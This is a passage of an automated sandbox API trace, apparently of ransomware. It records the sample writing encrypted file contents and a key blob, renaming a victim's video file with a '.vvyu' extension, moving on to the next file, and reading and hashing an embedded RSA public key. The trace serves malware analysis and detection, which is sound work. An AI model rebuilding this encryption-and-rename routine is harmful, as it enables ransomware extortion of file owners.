lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6938 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.564] GetCurrentThreadId () returned 0x5d8 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5450 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.564] GetCurrentThreadId () returned 0x5d8 [0198.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69c8 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeac80 | out: hHeap=0x2c0000) returned 1 [0198.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.575] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x11949, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11949, lpOverlapped=0x0) returned 1 [0198.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.577] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1194e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.577] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.578] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.578] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.578] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.579] CloseHandle (hObject=0x584) returned 1 [0198.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.581] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\AcPpdJ.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\acppdj.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\AcPpdJ.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\acppdj.avi.vvyu")) returned 1 [0198.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.582] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.585] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e5a4b0, ftCreationTime.dwHighDateTime=0x1d89e06, ftLastAccessTime.dwLowDateTime=0x45b84a20, ftLastAccessTime.dwHighDateTime=0x1d8a6d5, ftLastWriteTime.dwLowDateTime=0x45b84a20, ftLastWriteTime.dwHighDateTime=0x1d8a6d5, nFileSizeHigh=0x0, nFileSizeLow=0x7951, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CelE9.swf", cAlternateFileName="")) returned 1 [0198.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.586] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CelE9.swf") returned=".swf" [0198.586] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CelE9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cele9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.587] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=31057) returned 1 [0198.587] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.590] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x792b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.590] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.593] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.593] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x7951, lpOverlapped=0x0) returned 1 [0198.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.594] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.595] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.596] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.596] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.596] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.596] GetLastError () returned 0x0 [0198.596] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.596] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.596] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.596] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: 